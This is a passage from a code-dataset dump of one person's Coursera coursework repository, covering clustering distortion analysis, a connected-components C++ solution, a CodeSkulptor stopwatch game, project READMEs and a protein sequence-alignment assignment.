clustering algorithm\nprint \"Displaying\", len(cluster_list_kmean), \"k-mean clusters\" \nclust_plt.plot_clusters(data_table, cluster_list_kmean, True)\n\n######################################################\n##### Q7 Solution #####\n# Write a function compute_distortion(cluster_list) that takes a list of clusters and \n# uses cluster_error to compute its distortion. Now, use compute_distortion to compute \n# the distortions of the two clusterings in questions 5 and 6\n\ndef compute_distortion(cluster_list, data_table):\n \"\"\"Sums cluster_error over all clusters to give the distortion of the clustering\"\"\"\n\n distortion = sum([cluster.cluster_error(data_table) for cluster in cluster_list])\n\n return distortion\n\nprint compute_distortion(cluster_list_hierarc, data_table)\nprint compute_distortion(cluster_list_kmean, data_table)\n\n######################################################\n##### Q8 Solution #####\n# Examine the clusterings generated in Questions 5 and 6. In particular, focus your \n# attention on the number and shape of the clusters located on the west coast of the USA.\n# Describe the difference between the shapes of the clusters produced by these two methods \n# on the west coast of the USA. What caused one method to produce a clustering with a much \n# higher distortion? To help you answer this question, you should consider how k-means \n# clustering generates its initial clustering in this case.\n#\n# Ans: For the k-mean clustering (Figure 5) we can see that the 3 cluster centers are located \n# in the California region (one in the northern while two in the southern region), while of the 3 \n# centers for the hierarchical clustering one is located in Washington state and two in the \n# California region. 
The high distortion for the k-mean is due to the fact that the counties \n# in the cluster whose center is in northern California are distributed across Washington and \n# southern California, i.e. the counties are much farther from the center. The difference between \n# the distortion values arises because the initial clustering method for k-mean involves clustering \n# around the counties with the highest populations. Due to this, all 3 counties (the 3 largest circles, black \n# and pink) in southern California were included in the initial clustering while none from \n# Washington, Oregon or northern California was selected. This resulted in relatively \n# higher distortion.\n\n######################################################\n##### Q9 Solution #####\n# Based on your answer to Question 8, which method (hierarchical clustering or k-means \n# clustering) requires less human supervision to produce clusterings with relatively \n# low distortion?\n#\n# Ans: based on Q8, hierarchical clustering requires less human supervision\n# as it only requires choosing the number of output clusters, while on the other hand\n# k-mean needs a good choice of the initial cluster centers.\n\n######################################################\n##### Q10 Solution #####\n\nhierarc_distortion = 15 * [0]\nkmean_distortion = 15 * [0]\nnum_clusters_range = range(20, 5, -1)\n\n## do the calculations for 111 data set\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_111_URL)\n\n# generate clusters from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\nfor num_clusters in num_clusters_range:\n cluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, num_clusters)\n cluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, num_clusters, 5)\n hierarc_distortion[num_clusters - 6] = compute_distortion(cluster_list_hierarc, data_table)\n kmean_distortion[num_clusters - 6] = compute_distortion(cluster_list_kmean, data_table) \n\n# reverse the num_cluster_range\nnum_clusters_range.reverse()\n\n# plot the graphs of distortion for the two clustering methods for 111 counties\n#plt.figure(2)\nplt.plot(num_clusters_range, kmean_distortion, '-b', label = 'kmean')\nplt.plot(num_clusters_range, hierarc_distortion, '-k', label = 'hierarchical')\nplt.title('distortion for kmean vs hierarchical clustering for 111 counties')\nplt.xlabel('number of clusters')\nplt.ylabel('distortion')\nplt.legend(loc = 'upper right')\nplt.xlim(6, 20)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n\n## do the calculations for 290 data set\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_290_URL)\n\n# generate clusters from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\nnum_clusters_range = range(20, 5, -1)\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\nfor num_clusters in num_clusters_range:\n cluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, num_clusters)\n cluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, num_clusters, 5)\n hierarc_distortion[num_clusters - 6] = compute_distortion(cluster_list_hierarc, data_table)\n kmean_distortion[num_clusters - 6] = compute_distortion(cluster_list_kmean, data_table) \n\n# reverse the num_cluster_range\nnum_clusters_range.reverse()\n\n# plot the 
graphs of distortion for the two clustering methods for 290 counties\n#plt.figure(3)\nplt.plot(num_clusters_range, kmean_distortion, '-b', label = 'kmean')\nplt.plot(num_clusters_range, hierarc_distortion, '-k', label = 'hierarchical')\nplt.title('distortion for kmean vs hierarchical clustering for 290 counties')\nplt.xlabel('number of clusters')\nplt.ylabel('distortion')\nplt.legend(loc = 'upper right')\nplt.xlim(6, 20)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n\n## do the calculations for 896 data set\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_896_URL)\n\n# generate clusters from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\nnum_clusters_range = range(20, 5, -1)\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\nfor num_clusters in num_clusters_range:\n cluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, num_clusters)\n cluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, num_clusters, 5)\n hierarc_distortion[num_clusters - 6] = compute_distortion(cluster_list_hierarc, data_table)\n kmean_distortion[num_clusters - 6] = compute_distortion(cluster_list_kmean, data_table) \n\n# reverse the num_cluster_range\nnum_clusters_range.reverse()\n\n# plot the graphs of distortion for the two clustering methods for 896 counties\n#plt.figure(3)\nplt.plot(num_clusters_range, kmean_distortion, '-b', label = 'kmean')\nplt.plot(num_clusters_range, hierarc_distortion, '-k', label = 'hierarchical')\nplt.title('distortion for kmean vs hierarchical clustering for 896 counties')\nplt.xlabel('number of clusters')\nplt.ylabel('distortion')\nplt.legend(loc = 'upper right')\nplt.xlim(6, 20)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n\n######################################################\n##### Q11 Solution #####\n# For each data set (111, 290, and 896 counties), does one clustering method consistently \n# produce lower distortion clusterings when the number of output clusters is in the range \n# 6 to 20? If so, indicate on which data set(s) one method is superior to the other.\n#\n# Ans: for 111 counties, hierarchical clustering consistently produces lower-distortion clusterings.\n# For the other two data sets, neither method consistently produces lower distortion"
},
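The record above measures slow_closest_pair against fast_closest_pair by timing each call with time.time(). A minimal standalone sketch of that timing methodology follows; it substitutes plain (x, y) tuples and a brute-force O(n^2) closest-pair search for the alg_cluster machinery, so the function name and the point counts are illustrative assumptions, not part of the original solution.

```python
# Hedged sketch of the Q1 timing loop: brute_closest_pair and the point
# counts are made up for illustration; only the timing pattern mirrors
# the record above.
import random
import time

def brute_closest_pair(points):
    """Return (distance, i, j) for the closest pair by checking all pairs."""
    best = (float("inf"), -1, -1)
    for i in range(len(points) - 1):
        for j in range(i + 1, len(points)):
            dx = points[i][0] - points[j][0]
            dy = points[i][1] - points[j][1]
            best = min(best, ((dx * dx + dy * dy) ** 0.5, i, j))
    return best

for size in [50, 100, 200]:
    pts = [(random.uniform(-1, 1), random.uniform(-1, 1)) for _ in range(size)]
    start = time.time()
    brute_closest_pair(pts)
    print(size, "points:", time.time() - start, "seconds")
```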
{
"alpha_fraction": 0.561347246170044,
"alphanum_fraction": 0.6012429594993591,
"avg_line_length": 29.9743595123291,
"blob_id": "e6f574976dce5083336c589d847e2cc6a83276c0",
"content_id": "7e2440ac1d4385a3f68fe531d0a1d0ca0d048e15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5002,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 156,
"path": "/Algorithms on Graphs/Assignment1/connected_components.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: connected_components.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-02\r\n// description: Problem 2 of the first assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n//\t\t\t\tThe task was : Given an undirected graph with n vertices and m edges, compute \r\n//\t\t\t\tthe number of connected component in it.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\treach and number_of_components functions and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all 20 test on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 7.77/512 bytes. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n// Recursively finds all neighbours reachable from x using depth first search \r\n// and updates there visited status to true\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e3; 0 ≤ x ≤ adj.size()-1; visited.size() = adj.size()\r\n// POST: updates the visited status for all neighbours reachable from x to true \r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n// visited = keeps track of all the vertices that have already been visited\r\n// x = a vertice of adj for which we want to find the reachable neighbour vertices.\r\n\r\nvoid reach(vector<vector<int> > &adj, vector<bool> &visited, int x) {\r\n\r\n\tvisited[x] = true;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == false) {\r\n\r\n\t\t\treach(adj, visited, adj[x][v]);\r\n\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\n// Finds the total number of connected components of the graph adj using helper function reach\r\n// defined above.\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e3; visited.size() = adj.size();\r\n// POST: returns the number of total connected components by finding the reachable neighbours for all vertice of adj\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n// visited = keeps track of all the vertices that have already been visited\r\n\r\nint number_of_components(vector<vector<int> > &adj, vector<bool> visited) {\r\n\r\n\tint res = 0;\r\n\r\n\t// iterate for all vertices of the graph\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\r\n\t\tif (visited[v] == false) { // if vertice v has not yet been visited\r\n\t\t\treach(adj, visited, v); // update all reachable vertices from v \r\n\t\t\t++res;\t\t\t\t\t// and increment the result\r\n\t\t}\r\n\t}\r\n\r\n\treturn res;\r\n}\r\n\r\nint main() {\r\n\r\n\t// Few test case to check if the number_of_components function works. These are commented since the \r\n\t// assignment requires the connected_components.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\r\n\t//Test 1 : graph with 8 vertices, 4 edges. 
4 connected components\r\n\tvector<bool> visited1(8, false);\r\n\tvector<vector<int> > adj1(8, vector<int>());\r\n\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\r\n\tadj1[3 - 1].push_back(4 - 1);\r\n\tadj1[4 - 1].push_back(3 - 1);\r\n\r\n\tadj1[7 - 1].push_back(8 - 1);\r\n\tadj1[8 - 1].push_back(7 - 1);\r\n\r\n\tif (number_of_components(adj1, visited1) != 4)\r\n\t\tstd::cout << \"Test 1 failed\" << std::endl;\r\n\r\n\t//Test 2 : graph with 8 vertices, 0 edges. 8 connected components\r\n\tvector<bool> visited2(8, false);\r\n\tvector<vector<int> > adj2(8, vector<int>());\r\n\r\n\r\n\tif (number_of_components(adj2, visited2) != 8)\r\n\t\tstd::cout << \"Test 2 failed\" << std::endl;\r\n\r\n\t//Test 3 : graph with 8 vertices, 7 edges. 1 connected components\r\n\tvector<bool> visited3(8, false);\r\n\tvector<vector<int> > adj3(8, vector<int>());\r\n\r\n\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\tadj3[2 - 1].push_back(1 - 1);\r\n\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\tadj3[3 - 1].push_back(2 - 1);\r\n\r\n\tadj3[3 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(3 - 1);\r\n\r\n\tadj3[4 - 1].push_back(5 - 1);\r\n\tadj3[5 - 1].push_back(4 - 1);\r\n\r\n\tadj3[5 - 1].push_back(6 - 1);\r\n\tadj3[6 - 1].push_back(5 - 1);\r\n\r\n\tadj3[6 - 1].push_back(7 - 1);\r\n\tadj3[7 - 1].push_back(6 - 1);\r\n\r\n\tadj3[7 - 1].push_back(8 - 1);\r\n\tadj3[8 - 1].push_back(7 - 1);\r\n\r\n\tif (number_of_components(adj3, visited3) != 1)\r\n\t\tstd::cout << \"Test 3 failed\" << std::endl;\r\n\r\n\r\n\tsystem(\"PAUSE\");\r\n\r\n\t**************************************************************************************/\r\n\t// The code below was mostly provided as a part of the starter file for the assignment with few modifications\r\n\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<bool> visited(n, false);\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tstd::cout << number_of_components(adj, visited);\r\n\r\n\r\n}\r\n"
},
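The C++ record above counts connected components with a recursive reach helper. A hedged Python sketch of the same count follows, written iteratively with an explicit stack so long path graphs cannot overflow the recursion limit; the adjacency list in the example call is made up for illustration.

```python
# Iterative connected-components count over an adjacency list; a sketch
# mirroring the C++ reach/number_of_components pair above, not the
# graded solution.
def number_of_components(adj):
    visited = [False] * len(adj)
    components = 0
    for start in range(len(adj)):
        if visited[start]:
            continue
        components += 1           # new component discovered
        stack = [start]
        visited[start] = True
        while stack:              # depth-first walk without recursion
            node = stack.pop()
            for neigh in adj[node]:
                if not visited[neigh]:
                    visited[neigh] = True
                    stack.append(neigh)
    return components

# vertices 0-1-2 form one component, vertex 3 is isolated -> prints 2
print(number_of_components([[1], [0, 2], [1], []]))
```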
{
"alpha_fraction": 0.6371584534645081,
"alphanum_fraction": 0.6688524484634399,
"avg_line_length": 26.328357696533203,
"blob_id": "eecc939545bc5f3dd9b88fe486d6f655a0f8e20c",
"content_id": "a29ab8c4cb1a73bca28b3871e652862bbfede8d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1830,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 67,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project3 Stopwatch The Game/stop_watch.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "import simplegui\n\n# define global variables\ncountTenthOfSec = 0\nsuccessStops = 0\ntotStops = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(t):\n #get the tenth of the second digit\n D = t % 10\n #get the total seconds\n t = t / 10\n #convert seconds to minutes\n A = t/60\n #store the remaining seconds after converting to minutes\n BC = t % 60\n #get the unit digit of the seconds\n C = BC % 10\n #get the tens digit of the seconds\n B = (BC - C)/10\n \n return (str(A) + \":\" + str(B) + str(C) + \".\" + str(D))\n \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start_button_handler():\n timer.start()\n \ndef stop_button_handler():\n global totStops, successStops\n if (timer.is_running()):\n timer.stop()\n totStops += 1\n if (not(countTenthOfSec % 10)):\n successStops +=1\n\ndef reset_button_handler():\n global countTenthOfSec, totStops, successStops\n timer.stop()\n countTenthOfSec = 0\n totStops = 0\n successStops = 0\n\n# define event handler for timer with 0.1 sec interval\ndef timer_handler():\n global countTenthOfSec\n countTenthOfSec += 1\n\n# define draw handler\ndef draw(canvas):\n canvas.draw_text(format(countTenthOfSec), (100, 175), 50, 'White')\n canvas.draw_text(str(successStops) + \"/\" + str(totStops), (250,50), 30, 'White')\n\n# create frame\nframe = simplegui.create_frame(\"Stop Watch\", 300,300)\n\n# register event handlers\ntimer = simplegui.create_timer(100, timer_handler)\nframe.set_draw_handler(draw)\nstartButton = frame.add_button('start', start_button_handler, 100)\nstopButton = frame.add_button('stop', stop_button_handler, 100)\nresetButton = frame.add_button('reset', reset_button_handler,100)\n\n# start frame\nframe.start()\ntimer.start()"
},
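The stopwatch record above converts a count t of tenths of a second into an A:BC.D string by peeling off digits. Below is a standalone sketch of that conversion with a couple of sanity checks; the fmt name and the asserted test values are illustrative, not the graded code.

```python
# Sketch of the A:BC.D time formatting from the stopwatch record; fmt
# and the asserted values are illustrative assumptions.
def fmt(t):
    tenths = t % 10                      # D digit
    seconds = t // 10
    minutes, secs = divmod(seconds, 60)  # A and BC
    return "%d:%02d.%d" % (minutes, secs, tenths)

assert fmt(0) == "0:00.0"
assert fmt(605) == "1:00.5"    # 60.5 seconds
assert fmt(1234) == "2:03.4"   # 123.4 seconds
```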
{
"alpha_fraction": 0.8011226654052734,
"alphanum_fraction": 0.8051323294639587,
"avg_line_length": 137.6666717529297,
"blob_id": "309816911d18497d35dc4488d8ae42a86c64df93",
"content_id": "903243fad010c238ba3c67b31faacf5b882a62ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 414,
"num_lines": 9,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project8 RiceRocks(Asteroids)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #8 - RiceRocks\n\nImplemented a simple version of the classic arcade game Asteroids in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_dzLwwfibjR_8.py) and press the play button on the top left corner. A window will pop up and will require the clicking it to start the game. \nTurn on the volume to hear the game music and sounds. To navigate the spaceship use the arrow keys and to fire missiles use the spacebar. As the game progresses, the speed of rocks spawning will increase to make the game more competitive\n\nMini-project overview taken from course page can be found below:\n* For our last mini-project, we will complete the implementation of RiceRocks, an updated version of Asteroids, that we began last week. You should add the splash screen image that you dismiss with a mouse click before starting this mini-project. We strongly recommend using Chrome for this mini-project since Chrome's superior performance will become apparent when your program attempts to draw dozens of sprites.\n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-2/supplement/GjfKF/mini-project-description>"
},
{
"alpha_fraction": 0.7475035786628723,
"alphanum_fraction": 0.7746077179908752,
"avg_line_length": 99.14286041259766,
"blob_id": "a380ce8efdffbe32f890bb4d5199b48bbecf9815",
"content_id": "cc5d1e819903199556254a74c7d7d7e485733e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1402,
"license_type": "no_license",
"max_line_length": 643,
"num_lines": 14,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project1 2048(Merge)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #1 - 2048(Merge)\n\nImplemented the merge function to be used in the next project for the 2048 game logic.\n\nLink to my solution:\n<http://www.codeskulptor.org/#user46_Hn6NfnDEFx_13.py>\n\nMini-project overview taken from course page can be found below:\n* 2048 is a simple grid-based numbers game. The object of the game is to combine tiles with the same number to make larger numbered tiles. You \"win\" when you create a 2048 tile. In the first two assignments, we will implement a version of the 2048 game. Although the original game is played on a <a href=\"https://www.codecogs.com/eqnedit.php?latex=4&space;\\times&space;4\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?4&space;\\times&space;4\" title=\"4 \\times 4\" /></a> grid, your version should be able to have an arbitrary height and width. In this first assignment,we will focus on only one aspect of the game: merging tiles.\n\n* We have provided the following [template](http://www.codeskulptor.org/#poc_2048_merge_template.py) that contains the basic code that you will need to implement the merge function. The signature (name and parameters) of the functions in this file must remain unchanged, but you may add any additional functions or other code that you need to.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/1baei/mini-project-description>\n"
},
{
"alpha_fraction": 0.6559500098228455,
"alphanum_fraction": 0.667113184928894,
"avg_line_length": 48.35537338256836,
"blob_id": "90f42e33d35cb73f319c2a60d394a31c670f1823",
"content_id": "9459c8b05165a841a1c58cfe88244b1018e328a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17916,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 363,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 4/alg_application4_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAll answers to questions in Application #4 -\nApplications to Genomics and Beyond\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\nimport alg_application4_provided as alg_app4_prov\nimport alg_project4_solution as alg_proj4_sol\n\n##########################################################################\n# Solution Q1\n\n# Q1: First, load the files HumanEyelessProtein and FruitflyEyelessProtein \n# using the provided code. These files contain the amino acid sequences that \n# form the eyeless proteins in the human and fruit fly genomes, respectively. \n# Then load the scoring matrix PAM50 for sequences of amino acids. This scoring\n# matrix is defined over the alphabet {A,R,N,D,C,Q,E,G,H,I,L,K,M,F,P,S,T,W,Y,V,B,Z,X,-} \n# which represents all possible amino acids and gaps (the \"dashes\" in the alignment).\n# Next, compute the local alignments of the sequences of HumanEyelessProtein and \n# FruitflyEyelessProtein using the PAM50 scoring matrix and enter the score and \n# local alignments for these two sequences below. Be sure to clearly distinguish \n# which alignment is which and include any dashes ('-') that might appear in the \n# local alignment.\n\n# load the two amino acid sequences that form the eyeless proteins in the human \n# and fruit fly genomes\nhuman_seq = alg_app4_prov.read_protein(alg_app4_prov.HUMAN_EYELESS_URL)\nfly_seq = alg_app4_prov.read_protein(alg_app4_prov.FRUITFLY_EYELESS_URL)\n\n# load their scoring matrix\nscoring_matrix = alg_app4_prov.read_scoring_matrix(alg_app4_prov.PAM50_URL)\n\n# compute the local alignments matrix for these 2 sequences\nlocal_align_matrix = alg_proj4_sol.compute_alignment_matrix(human_seq, fly_seq, scoring_matrix, False)\n\n# compute the local alignments and the score for the two sequences\n(score_q1, align_human, align_fly) = alg_proj4_sol.compute_local_alignment(human_seq, \n fly_seq, scoring_matrix, \n local_align_matrix)\n\nprint \"Q1 Answers: \" \nprint \"Score: \",score_q1\nprint \"local alignment of human: \", align_human\nprint \"local alignment of fly: \", align_fly\nprint \n\n##########################################################################\n# Solution Q2 \n# Q2: To continue our investigation, we next consider the similarity of the two \n# sequences in the local alignment computed in Question 1 to a third sequence. \n# The file ConsensusPAXDomain contains a \"consensus\" sequence of the PAX domain;\n# that is, the sequence of amino acids in the PAX domain in any organism. In this \n# problem, we will compare each of the two sequences of the local alignment computed \n# in Question 1 to this consensus sequence to determine whether they correspond to \n# the PAX domain.\n#\n# Load the file ConsensusPAXDomain. For each of the two sequences of the local \n# alignment computed in Question 1, do the following:\n# \n# - Delete any dashes '-' present in the sequence.\n# - Compute the global alignment of this dash-less sequence with the ConsensusPAXDomain \n# sequence.\n# - Compare corresponding elements of these two globally-aligned sequences (local vs. 
\n# consensus) and compute the percentage of elements in these two sequences that agree.\n\n# load the file ConsensusPAXDomain\npax_domain_seq = alg_app4_prov.read_protein(alg_app4_prov.CONSENSUS_PAX_URL)\n\n# delete the dashes from the local human alignment from Q1 (the local fly\n# alignment contains no dashes for this data set)\nhum_nodash_seq = align_human.replace('-', \"\")\n\n# compute the global alignment matrix for the PAX domain and the dash-less local human alignment\nglob_align_mat_hum_pax = alg_proj4_sol.compute_alignment_matrix(pax_domain_seq, hum_nodash_seq, \n scoring_matrix, True)\n \n# compute the global alignment matrix for the PAX domain and the local fly alignment\nglob_align_mat_fly_pax = alg_proj4_sol.compute_alignment_matrix(pax_domain_seq, align_fly, \n scoring_matrix, True)\n\n(_, align_pax_hum, align_hum_nodash) = alg_proj4_sol.compute_global_alignment(pax_domain_seq, \n hum_nodash_seq, \n scoring_matrix, \n glob_align_mat_hum_pax)\n\n(_, align_pax_fly, align_fly_nodash) = alg_proj4_sol.compute_global_alignment(pax_domain_seq, \n align_fly, \n scoring_matrix, \n glob_align_mat_fly_pax)\n\ncount_pax_hum = 0.0\ncount_pax_fly = 0.0\n\n\nfor charc_i, charc_j in zip(align_pax_hum, align_hum_nodash):\n if charc_i == charc_j:\n count_pax_hum += 1\n\nprint \"Q2 Answers: \" \nprint (\"percentage of elements in the global alignment of local human vs PAX that agree: \" +\n str(round(count_pax_hum/len(align_pax_hum) * 100, 2)) + \"%\")\n\nfor charc_i, charc_j in zip(align_pax_fly, align_fly_nodash):\n if charc_i == charc_j:\n count_pax_fly += 1 \n\nprint (\"percentage of elements in the global alignment of local fly vs PAX that agree: \" +\n str(round(count_pax_fly/len(align_pax_fly) * 100, 2)) + \"%\")\nprint\n\n##########################################################################\n# Solution Q3\n# Q3: Examine your answers to Questions 1 and 2. Is it likely that the level of \n# similarity exhibited by the answers could have been due to chance? In particular, \n# if you were comparing two random sequences of amino acids of length similar to \n# that of HumanEyelessProtein and FruitflyEyelessProtein, would the level of agreement \n# in these answers be likely? To help you in your analysis, there are 23 amino acids \n# with symbols in the string \"ACBEDGFIHKMLNQPSRTWVYXZ\". Include a short justification \n# for your answer.\n#\n# Ans: The number of elements matching between each local alignment and the PAX \n# consensus domain is too high to be deemed a match due to chance.\n# \n# For local human vs PAX, 97 out of 133 elements match, and the probability\n# for all 97 of them to match by chance would be quite small given that we have\n# to randomly choose among 23 symbols and that the probability of choosing\n# each symbol is equal\n#\n# The same can be said for the local fly vs PAX, where 94 out of the 134 elements\n# match\n\nprint \"Q3 Answers:\"\nprint \"length of global alignment of human vs pax: \", len(align_pax_hum)\nprint \"number of elements matching in this global alignment: \", int(count_pax_hum)\nprint \"length of global alignment of fly vs pax: \", len(align_pax_fly)\nprint \"number of elements matching in this global alignment: \", int(count_pax_fly)\nprint \n\n##########################################################################\n# Solution Q4\n#\n# Q4: Write a function generate_null_distribution(seq_x, seq_y, scoring_matrix, num_trials) \n# that takes as input two sequences seq_x and seq_y, a scoring matrix scoring_matrix, and a \n# number of trials num_trials. 
This function should return a dictionary scoring_distribution \n# that represents an un-normalized distribution generated by performing the following process \n# num_trials times:\n#\n# - Generate a random permutation rand_y of the sequence seq_y using random.shuffle().\n# - Compute the maximum value score for the local alignment of seq_x and rand_y using the score \n# matrix scoring_matrix.\n# - Increment the entry score in the dictionary scoring_distribution by one.\n#\n# Use the function generate_null_distribution to create a distribution with 1000 trials using \n# the protein sequences HumanEyelessProtein and FruitflyEyelessProtein (using the PAM50 scoring matrix). \n# Important: Use HumanEyelessProtein as the first parameter seq_x (which stays fixed) and \n# FruitflyEyelessProtein as the second parameter seq_y (which is randomly shuffled) when calling \n# generate_null_distribution. Switching the order of these two parameters will lead to a slightly \n# different answers for question 5 that may lie outside the accepted ranges for correct answers.\n# \n# Next, create a bar plot of the normalized version of this distribution using plt.bar in \n# matplotlib (or your favorite plotting tool). (You will probably find CodeSkulptor too slow to \n# do the required number of trials.) The horizontal axis should be the scores and the vertical axis \n# should be the fraction of total trials corresponding to each score. As usual, choose reasonable \n# labels for the axes and title. Note: You may wish to save the distribution that you compute in \n# this Question for later use in Question 5.\n\ndef generate_null_distribution(seq_x, seq_y, scoring_matrix, num_trials):\n \"\"\"\n Takes as input two sequences seq_x and seq_y, a scoring matrix scoring_matrix, and a \n number of trials num_trials. This function should return a dictionary scoring_distribution \n that represents an un-normalized distribution generated by performing the following process \n num_trials times:\n\n - Generate a random permutation rand_y of the sequence seq_y using random.shuffle().\n - Compute the maximum value score for the local alignment of seq_x and rand_y using the score \n matrix scoring_matrix.\n - Increment the entry score in the dictionary scoring_distribution by one. 
\n \n Arguments:\n seq_x {string} -- a sequence of alphabets representing amino acids\n seq_y {string} -- a sequence of alphabets representing amino acids\n scoring_matrix {dict of dict} -- the scoring matrix for all alphabet plus \"-\" combinations\n num_trials {integer} -- the number of trials\n \n Returns:\n dict -- a dictionary representing the scoring distribution \n \"\"\"\n\n # initialize the scoring distribution\n scoring_distribution = {}\n\n for dummy_idx in range(num_trials):\n # generate a random permutation of seq_y\n rand_y = list(seq_y)\n random.shuffle(rand_y)\n rand_y = \"\".join(rand_y)\n\n # compute the local alignment matrix for seq_x and rand_y\n local_align_matrix = alg_proj4_sol.compute_alignment_matrix(seq_x, rand_y, scoring_matrix, False)\n\n # compute the local alignment score for the two sequences\n (score, _, _) = alg_proj4_sol.compute_local_alignment(seq_x, rand_y, scoring_matrix, local_align_matrix)\n\n # increment the entry score in the scoring_distribution\n if scoring_distribution.has_key(score):\n scoring_distribution[score] += 1\n else:\n scoring_distribution[score] = 1 \n\n\n return scoring_distribution\n\n# get the scoring distribution for 1000 trials for HumanEyelessProtein and FruitflyEyelessProtein\nscoring_dist = generate_null_distribution(human_seq, fly_seq, scoring_matrix, 1000)\n\nsum_of_vals = float(sum(scoring_dist.values()))\nnorm_values = [value/sum_of_vals for value in scoring_dist.values()]\nplt.bar(scoring_dist.keys(), norm_values)\nplt.title('Hypothesis testing for 1000 trials for null distribution')\nplt.xlabel('Local alignment scores')\nplt.ylabel('frequency of scores/fraction of trials')\nplt.xlim(None, None)\nplt.ylim(None, None)\nplt.show()\n\n# ##########################################################################\n# Solution Q5\n#\n# Q5: What are the mean and standard deviation for the distribution that you \n# computed in Question 4?\n# What is the z-score for the local alignment for the human eyeless protein vs. \n# the fruitfly eyeless protein based on these values?\n\n# calculate the mean of the distribution\nnum_trials = 1000.0\nmean_mu = sum([key * value for key, value in scoring_dist.items()])/num_trials\n\n# calculate the standard deviation \nsigma = sum([((key - mean_mu) ** 2) * value for key, value in scoring_dist.items()])/num_trials\nsigma = sigma ** 0.5\n\n# use the mean and standard deviation to calculate the z-score\nz_score = (score_q1 - 